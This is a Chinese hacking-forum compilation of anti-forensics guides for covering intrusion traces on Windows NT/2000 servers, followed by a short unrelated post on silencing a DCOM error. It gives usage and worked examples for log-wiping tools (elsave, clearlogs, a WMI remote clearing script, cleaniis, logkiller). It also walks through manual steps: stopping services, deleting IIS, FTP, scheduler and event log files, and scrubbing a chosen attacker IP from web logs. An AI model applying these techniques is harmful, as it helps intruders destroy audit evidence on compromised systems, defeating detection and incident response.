saves and/or clears a windows nt event log. version 0.4 19980907.
-s \\server  server for which you want to save or clear the log.
-l log       name of log to save or clear.
-f file      save the log to a file with this name. must be absolute path to
            local file on the server for which you want to save the log.
-c           clear the log.
-q           write errors to the event log
那么我要删除远程机器的应用程序日志命令格式如下:
elsave -s \\192.168.0.77  -l "application" -c
同样的要删除安全日志和系统日志,就在-l参数后跟上“security”和“system”来。
另外一个工具是clearlogs使用说明如下:
f:\tools\rizhi>clearlogs

clearlogs 1.0 - (c) 2002, arne vidstrom (arne.vidstrom@ntsecurity.nu)
             - http://ntsecurity.nu/toolbox/clearlogs/

usage: clearlogs [\\computername] <-app / -sec / -sys>

       -app = application log
       -sec = security log
       -sys = system log

比elsave简单多了是不是啊,呵呵!~~~~~我在此就不再赘述。这两个工具都需要你建立ipc连接来完成,那么如果没有ipc怎么办啊。那就是基于wmi(windows 管理规范)来清除了。
如下:
f:\tools\rizhi>cscript dellog.vbs
microsoft (r) windows 脚本宿主版本 5.1 for windows
版权所有(c) microsoft corporation 1996-1999. all rights reserved.

*******************************************************************************
rcls v1.06
remote clear eventlogs script, by zzzevazzz
welcome to visite www.isgrey.com
usage:
cscript f:\tools\rizhi\dellog.vbs targetip username password [lognamelist]
lognamelist:
  logname1[,logname2...]    clear specified logs
  *|-a|-all                 clear all logs
  -v|-view|null             enum log names
*******************************************************************************

可以删除指定的日志,也可以全部删除,是不是很容易咧。呵呵!~~~~~~

好了系统自带的日志我就介绍到这里。下面我们来看看,iis日志。
二。iis日志。iis日志保存在%systemroot%\system32\logfiles\下。如果启动了web server的话,那么就会在上述路径下多出一个w3svc1的文件夹,用来存储web服务日志。
如果也启动了iis 自带的ftp服务,那么还有会有个msftpsvc1的文件夹,里面是ftp的日志。
让我们来看看本地清除,要用到的工具是cleaniis.exe如下:
f:\tools\rizhi>cleaniis
iisantidote <logfile dir> <ip or string to hide>
iisantidote <logfile dir><ip or string to hide> stop
stop opiton will stop iis before clearing the files and restart it after
<logfile dir> exemple : c:\winnt\system32\logfiles\w3svc1\ dont forget the \

什么意思呢??我来给大家举个例子吧:
cleaniis c:\winnt\system32\logfiles\w3svc1\ 10.24.9.100

//清除log中所有此ip地址的访问记录.

cleaniis c:\winnt\system32\logfiles\w3svc1\ /shop/admin/

//清除log中所有对此目录的访问记录.

cleaniis c:\winnt\system32\logfiles\w3svc1\ 10.24.9.100 stop

//使用stop参数进行日志清除.

与此类似的还有一个工具如下:
f:\tools\rizhi>clog

cleaniislog ver 0.1, by assassin 2001. all rights reserved.

usage: cleaniislog <logfile>|<.> <cleanip>|<.>

logfile - specify log file which you want process.
         specified "all" will process all log files.

cleanip - specify ip address which you want clear.
         specified "." will clean all ip record.
这个跟上面的工具是差不多的,我就不再赘述了我只举个例子:
clog all 192.168.1.30 //清楚所有日志里的此ip的记录!~~~~~

iis日志我还没找到过远程删除的,上面我提到的那个dellog.vbs好象是可以,大家可以测试一下。

三。终端服务的日志。3. 清空终端服务的日志只有在图形界面控制下去完成了。这是因为终端服务的开启日志的配置的特殊性所造成的。我们还是来讨论讨论吧。首先要知道如果存在终端服务,如果管理员开启了日志,设置该日志记录的位置会在什么地方。如下图,先打开"终端服务配置",找到"连接"里的rdp-tcp。并右击其"属性"。
点击"环境"选项卡,看看管理员是否运行了什么用来作日志记录的程序。(记得shotgun写过相关的bat文件,大家有兴趣的话,可以在网上查找一下,一定有的。)这是一个会作日志记录的地方。

接下来就是"权限"选项卡里的"高级"选项了。点击进去看一看吧!
点击进去后,如图9所示。在"审核"选项卡里可以确认是否对某些组,某些帐号配置了审核。不过大家放心这个审核是记录在事件查看器里的。上面我们已介绍过如何清除了。
好了,据我所知终端服务的日志记录就是在这两个地方配置的。若有遗漏还请大家多多指教啊!谢谢。
提醒大家注意,如果你是通过gui或终端服务连接对方服务器的话,一定要记住将documents and settings里对应登录的帐号文件夹给删了。可别忘了啊…。
rmdir [/q] [驱动器:]路径
rd [/q] [驱动器:]路径

/s 除目录本身外,还将删除指定目录下的所有子目录和 文件。用于删除目录树。
/q 安静模式,加 /s 时,删除目录树结构不再要求确认
这里还有个工具,本地运行来清除历史记录等等运行情况如下:
f:\tools\rizhi>cleaner
cleaner v1.0 - deletes ie temp files, cookies and history by wineggdrop

cleaning temp files and cookies......ok
cleaning history......ok
cleaning the recent documents......ok

是不是很全面啊,呵呵不错的工具!黑吧有下载啊!~~~~~~~~~

五一长假我还在写,累啊!~~~~~~~~~~555,
好了怎么利用工具清除日志我都给大家介绍的很清楚了。至于任何手工清除日志我这里就不再多少了,找到日志的存放的目录用命令行下的删除命令来删除(如上我已经介绍了rmdir等命令的参数),如果碰到删除不了的很有可能是正在使用,可以给他改一下名字,再删除。
如果大家使用了计划任务那么你还要删除计划任务的日志工具运用如下:
f:\tools\rizhi>logkiller
log killer v1.0 by wineggdrop

cleaning event logs......
clean application event log successfully
clean security event log successfully
clean system event log successfully
-----------------------------------------------------------------------------
backing up services status...... done

-----------------------------------------------------------------------------
stopping services......
the service "msftpsvc" doesn't exist
stopping the service "smtpsvc"......
stopping the service "w3svc"......
stopping the service "schedule"......
-----------------------------------------------------------------------------

deleting all log files......
delete c:\winnt\system32\logfiles\w3svc1\ex000811.log successfully
remove directory c:\winnt\system32\logfiles\w3svc1 succesfully
remove directory c:\winnt\system32\logfiles succesfully
-----------------------------------------------------------------------------

deleting schedule event log file......
delete c:\winnt\schedlgu.txt successfully
-----------------------------------------------------------------------------

restoring services status......
starting service "smtpsvc"
starting service "w3svc"
starting service "schedule"
-----------------------------------------------------------------------------

mission accomplished

看到了吗??这个工具非常的全面,在命令行下直接输入logkiller就可以了,以删除的日志如下
1.删除"应用程序日志","安全日志"和"系统日志"
2.删除iis,系统本身ftp服务,系统本身smtp服务日志
3.删除计划任务日志

不错吧!~~~~~
我想想啊,还有什么没说到的!~~~~~~~~~~~哦靠,对了还有一点,日志清除的顺序,一定要先把审核停掉(如果有的话)再清除iis日志和ftp 等包括计划任务的日志,最后才是应用程序日志,安全日志和系统日志,别忘了再把审核给打开。


一个2000的日志清除器是怎么练成的
我想大想一定用过小榕的cleaniislog,是一个不错的日志清除工具。不过可惜,只
能清除iis的日志,那ftp和shedule待产生的日志文件呢,我们一般只能手动清除。
windows2000的日志文件通常有应用程序日志,安全日志、系统日志、dns服务器日志、
ftp日志、www日志等等,可能会根据服务器所开启的服务不同。

一般步骤如下:
1.清除iis的日志。
可不要小看iis的日志功能,它可以详细的记录下你的入侵全过程,如
如你用unicode入侵时ie里打的命令,和对80端口扫描时留下的痕迹。你可能就因为对
其不注意,而被网管盯上,说不定还会.......呵呵
那我们就可手动清除吧
1.日志的默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志
那我们就切换到这个目录下吧
del *.*
你大概想是安全了吧,那就dir一下吧
咦,咦,今天的日志怎么还在,不要慌。因为w3svc服务还开着,那我们怎么清除这个日志文件呢?
方法一:如有3389可以登录,那就用notepad打开,把ctrl+a 然后del吧。
方法二:net 命令
c:\>net stop w3svc
world wide web publishing service 服务正在停止.(可能会等很长的时间,也可能不成功)
world wide web publishing service 服务已成功停止。
好了w3svc停止了,我们可以清空它的日志了,del *.*吧
还有不要忘了再打开w3svc服务呀
c:\>net start w3svc
2.清除ftp日志。
ftp日志默认位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志
清除方法同上
3.清除scheduler日志
scheduler服务日志默认位置:%systemroot%\schedlgu.txt
清除方法同上
4.应用程序日志、安全日志、系统日志、dns日志默认位置:%systemroot%\sys tem32\config
清除方法同上

注意以上三个目录可能不在上面的位置,那是因为管理员做的修改
可以读取注册表值得到他们的位置
应用程序日志,安全日志,系统日志,dns服务器日志,它们这些log文件在注册表中的:
hkey_local_machine\sys tem\currentcontrolset\services\eventlog
schedluler服务日志在注册表中
hkey_local_machine\software\microsoft\schedulingagent

5.我是借鉴了别人文章(其实就是抄了)
ok!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是event log,试着停掉它!
d:\server\sys tem32\logfiles\w3svc1>net stop eventlog
这项服务无法接受请求的 "暂停" 或 "停止" 操作。
kao,i 服了 u,没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,
输入远程计算机的ip,耐心等上数十分钟,
选择远程计算机的安全性日志,右键选择它的属性:
点击属性里的“清除日志”按钮,ok!安全日志清除完毕!同样的忍受痛苦去清除系统日志!
6.上面大部分重要的日志你都已经清除了。然后要做的就是以防万一还有遗漏的了。
那就这样做吧 del以下的一些文件
\winnt\*.log
system32下
\logfiles\*.*
\dtclog\*.*
\config\*.evt
\*.log
\*.txt

其实这篇文章的主要日的,不是教你怎么清除日志,而是教你写一个日志清除的工具。
如果你还学不会,那就到黑吧去学吧~`
现在转入正题:
你已经了解了,要清除一些日志,首先要关闭一些服务程序
我推荐你选用一个可以看机器的服务程序的dos小工具,具体实现看以前的文章
《如果做一个dos下的服务程序查看器》
工具名sername.exe
运行一下sername.exe吧
sername.exe -t 1 -t 1
呵呵,所有的机器正在运行的服务程序显示出来了吧。
记住你要关的服务程序名吧。


最近发现许多win2000的电脑在日志中出现如下dcom错误的记录, 并且, 该日志几乎每时每该都在产生, 以致于清空日志后一天之内事件查看器就会爆满.

内容如下:
<见图>
事件类型: 错误
事件来源: dcom
事件种类: 无
事件 id: 10002
日期: 2004-5-30
事件: 16:42:59
用户: n/a
计算机: ddmdd
描述:
启动 dcom 服务器的访问被拒绝。 服务器是:
{00020906-0000-0000-c000-000000000046}
用户是 unavailable/unavailable, sid=unavailable.


虽然并不影响正常使用, 每次开机时弹出一个提示日志已满的窗口总觉得令人不舒服. 在网上搜索,也都是在论坛里有人提问,没有有效的解决办法.于是在微软网站找了一下.参考了一些相关资料
http://support.microsoft.com/default.aspx?scid=kb;en-us;298095
http://support.microsoft.com/default.aspx?scid=kb;en-us;290398

仍未能解决问题. 最后想到禁用dcom, 打开dos窗口, 运行
dcomcnfg
在默认属性里取消选择"在这台计算机上启用分布式com". <如图>

重启后就会发现日志查看器已经干净多了.


注意,根据微软资料:

如果禁用 dcom,则操作系统可能会失去某些功能。禁用对 dcom 的支持后,可能会导致以下结果:
任何能被远程激活的 com 对象都可能无法正常工作。
本地 com+ 管理单元将不能连接到远程服务器上以枚举它们的 com+ 编录。
证书自动注册可能无法正常工作。
windows 管理规范 (wmi) 对远程服务器的查询可能无法正常工作。

不过这些暂时还没有感觉到.


windows2000的日志文件通常有应用程序日志、安全日志、系统日志、dns服务器日志、ftp日志、www日志等等,可能会根据服务器所开启的服务不同。

  一般步骤如下:

  1.清除iis的日志。

  可不要小看iis的日志功能,它可以详细的记录下你的入侵全过程,如你用unicode入侵时ie里打的命令,和对80端口扫描时留下的痕迹。你可能就因为对其不注意,而被网管盯上,说不定还会…… 呵呵。

  那我们就可手动清除吧:

  1. 日志的默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。那我们就切换到这个目录下吧,然后 del *.*。你大概想是安全了吧,那就dir一下吧。…… 咦,咦,今天的日志怎么还在?不要慌!因为w3svc服务还开着,那我们怎么清除这个日志文件呢?

  方法一: 如有3389可以登录,那就用notepad打开,按ctrl+a 然后del吧。

  方法二: net 命令

  c:\>net stop w3svc

  world wide web publishing service 服务正在停止。(可能会等很长的时间,也可能不成功)
  world wide web publishing service 服务已成功停止。

  好了w3svc停止了,我们可以清空它的日志了, del *.*吧  
 
  还有不要忘了再打开w3svc服务呀!

  c:\>net start w3svc

  2. 清除ftp日志

  ftp日志默认位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志,清除方法同上。

  3. 清除scheduler日志

  scheduler服务日志默认位置:%systemroot%\schedlgu.txt。清除方法同上。

  4. 应用程序日志、安全日志、系统日志、dns日志默认位置:%systemroot%\sys tem32\config 。清除方法同上。

  注意以上三个目录可能不在上面的位置,那是因为管理员做了修改。可以读取注册表值得到他们的位置:

  应用程序日志,安全日志,系统日志,dns服务器日志,它们这些log文件在注册表中的

  hkey_local_machine\sys tem\currentcontrolset\services\eventlog

  schedluler服务日志在注册表中的

  hkey_local_machine\software\microsoft\schedulingagent

  ok!恭喜,现在简单的日志都已成功删除。下面就是很难的安全日志和系统日志了,守护这些日志的服务是event log,试着停掉它!

  d:\server\system32\logfiles\w3svc1>net stop eventlog

  这项服务无法接受请求的 "暂停" 或 "停止" 操作。没办法,它是关键服务。如果不用第三方工具,在命令行上根本没有删除安全日志和系统日志的可能!所以还是得用虽然简单但是速度慢得死机的办法:打开“控制面板”的“管理工具”中的“事件查看器”(98没有,知道用win2k的好处了吧),在菜单的“操作”项有一个名为“连接到另一台计算机”的菜单,点击它然后输入远程计算机的ip,然后点支烟,等上数十分钟,忍受象死机的折磨,终于打开了!然后选择远程计算机的安全性日志,右键选择它的属性,点击属性里的“清除日志”按钮,ok!安全日志清除完毕!同样的忍受痛苦去清除系统日志!

  5.上面大部分重要的日志你都已经清除了。然后要做的就是以防万一还有遗漏的了。

  那就这样做吧:

  del以下的一些文件:
  
  \winnt\*.log
  
  system32下
  \logfiles\*.*
  \dtclog\*.*
  \config\*.evt
  \*.log
  \*.txt

  到此为止,我常用的清除日志方法是不是对你也有帮助,我相信很朋友都能派上用场了吧。


trackback: http://tb.blog.csdn.net/trackback.aspx?postid=777578




欢迎光临 逐梦论坛 (http://temp2023.zhumeng.org/) Powered by Discuz! 7.2